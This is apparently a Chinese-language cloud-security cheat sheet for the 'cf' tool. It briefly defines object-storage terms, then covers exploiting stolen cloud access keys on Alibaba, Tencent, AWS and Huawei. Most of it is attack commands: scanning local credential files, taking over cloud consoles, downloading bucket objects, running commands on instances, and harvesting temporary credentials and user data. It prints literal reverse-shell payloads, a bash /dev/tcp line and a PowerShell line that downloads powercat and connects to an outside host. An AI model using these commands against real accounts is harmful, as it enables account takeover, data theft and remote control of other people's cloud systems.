云安全初探

20240424 云更新

云安全初探

扫盲

术语

Bucuket:存储空间、桶。

  1. 名称全局唯一,创建之后名称无法修改
  2. 每个用户可以有多个bucket
  3. 内部是扁平的,没有目录等概念,简单理解为一个个entry
  4. 所有对象隶属于对应的bucket,对象数量无限

Object: 对象

  1. object被称为OSS的文件
  2. 其由元信息Object Meta、用户数据Data和文件名Key组成。由bucket内唯一的key来标识。
  3. 可以覆盖上传同名对象,从而实现文件修改。

ObjectKey:上传的Object所在bucket的完整名称

Endpoint:OSS对外服务的访问域名

AccessKey:AK

OSS使用AccessKeyId和AccessKeySecret对称加密的方式来验证请求的发送者身份

cf

目的

获取AK后的利用

流程(以alibaba为例)

凭证设置

###配置凭证
cf config		###配置文件位置~/.config/cf/cache.db

###列出凭证
cf config ls -a 

###删除凭证
cf config del 

###切换凭证
cf config sw

###扫描本地配置
cf config scan 

###各云提供商本地配置文件
~/.aliyun/config.json
~/.tccli/*.credential
~/.aws/credentials
~/.huaweicloud/credentials

#查权限

###列出当前凭证的权限
cf alibaba perm

列出所有服务OSS ECS RDS

cf alibaba ls 
	-r 			###指定区域
	-a 			###所有服务 包括私有区域

列出所有区域

cf alibaba regions ecs 
	-a 
cf alibaba regions rds 

cf tencent regions cvm 

控制台接管

###列出当前凭证的权限
cf alibaba perm

###接管控制台,其他平台修改名字即可tencent huawei...
cf alibaba console -u xxx用户名

###查看接管的控制台的信息
cf alibaba console ls 

###取消接管
cf alibaba console cancel

对象存储

列出对象存储服务,(就是列出bucket)
###其他平台 
cf aws s3 ls
cf huawei obs ls

###默认会缓存到~/.config/cf/cache.db,刷新的话带上--flushCache 

###列出OSS 对象存储服务
cf alibaba oss ls   
	-n 	100				###添加-n参数可以指定获取对象的数量,但是如果第二次执行,需要加--flushCache参数
	-r 	cn-beijing		###指定区域
	-b  bucket_name		###指定bucket名字
列出bucket里的对象,就是列出bucket里的object
cf alibaba oss obj ls 
	-n 	100				###添加-n参数可以指定获取对象的数量,但是如果第二次执行,需要加--flushCache参数
	-r 	cn-beijing		###指定区域
	-b  bucket_name		###指定bucket名字
下载bucket里的对象
cf alibaba oss obj get 
	-n 	100				###添加-n参数可以指定获取对象的数量,但是如果第二次执行,需要加--flushCache参数
	-r 	cn-beijing		###指定区域
	-b  bucket_name		###指定bucket名字
	-k  objectName		###指定对象名
	-o  /tmp/xxx		###指定输出路径
	

弹性计算服务

列出ecs
###其他平台 
cf tencent cvm ls 
cf tencent lh ls 
cf aws ec2 ls 



cf alibaba ecs ls 
	--running 					###正在运行的实例
	-r 	i-abcdefghijklmn		###指定区域
	-i 							###指定实例
	-a 							###遍历阿里云的所有区域,包括私有区域
实例上执行命令
###其他平台
cf tencent cvm exec 
cf tencent lh exec

cf alibaba ecs exec 
	-c whoami				###指定命令
	-i i-abcdefghijklmn		###指定某个实例
	-s ps 					###执行powershell下的命令 -c \$PSVersionTable -s ps
	-t 120					###执行命令等待的最大事件
	-f cmd.txt				###执行批量命令,一行一个,顺序执行
	
	
###一键执行三要素,证明成果
cf alibaba ecs exec -b 
	-i i-abcdefghijklmn		###指定实例
cf tencent cvm exec -b 
cf tencent lh exec -b


###获得临时访问凭证
cf alibaba ecs exec -m
	 -i 					###指定实例
cf tencent cvm exec -m
cf tencent lh exec -m
//////cf alibaba ecs exec -c "cat ~/.aliyun/config.json"


###一键获得用户数据
cf alibaba ecs exec -u
	 -i 					###指定实例
cf tencent cvm exec -u
cf tencent lh exec -u


###反弹shell
cf alibaba ecs exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn  
cf tencent cvm exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn
cf tencent lh exec --lhost 123.123.123.123 --lport 4444 -i i-abcdefghijklmn
默认命令:
bash -i >& /dev/tcp/123.123.123.123/4444 0>&1
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://ghproxy.com/raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 123.123.123.123 -p 4444 -e cmd

RDS 云数据库

列出云数据库
cf alibaba rds ls 
	-r		###指定区域
	-i		###指定数据库id
	-e		###指定数据库类型
	
updatedupdated2024-04-242024-04-24